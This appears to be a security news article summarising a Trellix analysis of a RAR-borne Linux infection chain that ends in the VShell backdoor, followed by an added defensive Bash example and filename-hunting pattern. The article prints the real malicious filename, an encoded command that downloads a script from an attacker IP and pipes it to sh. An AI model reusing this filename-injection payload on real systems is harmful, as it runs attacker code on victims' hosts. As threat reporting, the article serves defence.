GBHackers

Weaponized RAR Files Deliver VShell Backdoor on Linux Systems


Trellix Advanced Research Center has exposed an infection chain that weaponises nothing more than a filename to compromise Linux hosts.

A spam message masquerading as a beauty-product survey offers a small reward and carries a RAR archive, yy.rar. When unpacked, the archive drops a single file whose name is a miniature Bash program: ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash

The braces exploit Bash's "process expansion" syntax. Any unsanitised loop that enumerates filenames (think for f in *; echo "$f", or an eval wrapped around an ls) blindly evaluates the content inside the braces, echoing a Base64 blob, decoding it on the fly and piping the plaintext to bash.

No conventional executable bit or macro is necessary; a routine inventory script or log collector is enough to detonate the payload.

Malware infection flow

The decoded Stage-1 script reaches out to 47.98.194.60:8084 and silently grabs a second Bash downloader.

Persistence is achieved by expanding PATH and probing writable directories such as /tmp, /usr/local/bin and /usr/libexec.

The script fingerprints the host's CPU (x86_64, i386, armv7l, aarch64) and pulls the matching ELF loader, then invokes it with nohup in the background to survive session terminations.

Each copy attempt is wrapped in redirection to /dev/null, minimising forensic artefacts on disk.

The Stage-2 ELF loader, strongly associated with the Snowlight family, constructs an HTTP GET containing the host tag, architecture identifier and listening port, then collects an XOR-enciphered binary blob.

XOR encryption assembly

A single-byte key (0x99) is applied in memory, after which the program executes the resulting payload via fexecve(), keeping the backdoor off disk entirely. To avoid duplicate infections, a marker file /tmp/log_de.log is checked before launch.

Finally, the process's argv is rewritten to mimic a benign kernel worker thread, [kworker/0:2], enabling it to hide in plain sight during ps or top inspections.

VShell Backdoor Capabilities

The decrypted payload is VShell, a Go-based remote-access tool favoured by several Chinese APT crews. VShell provides interactive reverse shells, file upload/download, process listing and port-forwarding.

Its HTTP C2 channel is wrapped in custom XOR routines, and its binaries are compiled for multiple architectures, making the campaign equally dangerous to cloud servers, IoT appliances and development workstations.

According to the report, the campaign bypasses three traditional detection layers at once: antivirus engines rarely scan filenames, static scanners miss the de-obfuscation chain, and behavioural tools cannot flag execution until the filename is expanded.

Because many DevOps, backup and monitoring scripts iterate through directories without sanitising input, the technique weaponises the very transparency and flexibility that make Linux attractive.

Mitigation requires strict input sanitisation (e.g., printf '%q' for filenames), the removal of eval from maintenance scripts, and monitoring for anomalous outbound HTTP requests from transient binaries in /tmp or /usr/local/bin. Security teams should also hunt for fake kernel threads and unusual uses of fexecve.
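The following script is an added example, not code from the Trellix report or the GBHackers article: it places an inventory loop in the vulnerable shape described above (eval around a listing) beside the printf '%q' fix and a simple name-hunting helper, and runs them against a constructed filename whose brace group expands to a harmless echo instead of the base64/bash chain. The filename, directory and function names are all assumptions made for the demo.

```shell
#!/usr/bin/env bash
# Added example, not from the Trellix report: an inventory loop in the
# vulnerable shape the article describes next to the printf '%q' fix,
# run against a constructed, harmless filename. Re-exec under bash if
# started by a POSIX sh (brace expansion and %q are bash features).
if [ -z "${BASH_VERSION:-}" ] && [ -r "$0" ]; then exec bash "$0" "$@"; fi

# Constructed demo name: once eval'd, the pipe plus brace group becomes
# "| echo BRACE_EXPANSION_RAN", the same shape as the real chain but
# with a harmless command in place of base64 -d and bash.
DEMO_NAME='report.pdf|{echo,BRACE_EXPANSION_RAN}'

# Create a scratch directory holding one clean file and the demo file.
make_demo_dir() {
  local d
  d=$(mktemp -d)
  : > "$d/clean.txt"
  : > "$d/$DEMO_NAME"
  printf '%s\n' "$d"
}

# Anti-pattern: eval around a directory listing. The filename is
# re-parsed as shell syntax, so brace expansion runs inside it and the
# second line of output is the echo, not a path.
vulnerable_inventory() {
  local dir=$1 f
  for f in "$dir"/*; do
    eval "ls -d $f" 2>/dev/null
  done
}

# Hardened form: printf '%q' escapes every shell metacharacter, so the
# quoted name stays a single literal word even if it is eval'd later.
safe_inventory() {
  local dir=$1 f
  for f in "$dir"/*; do
    printf '%q\n' "$f"
  done
}

# Hunt helper: flag names carrying a brace group or other shell syntax.
suspicious_names() {
  local dir=$1 f name
  for f in "$dir"/*; do
    name=${f##*/}
    case "$name" in
      *\{*,*\}*|*'|'*|*';'*|*'$('*|*'`'*) printf '%s\n' "$name" ;;
    esac
  done
}
```

Running vulnerable_inventory on the scratch directory prints BRACE_EXPANSION_RAN where a path should be, while safe_inventory prints the name with its braces and pipe backslash-escaped.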

Indicators of Compromise

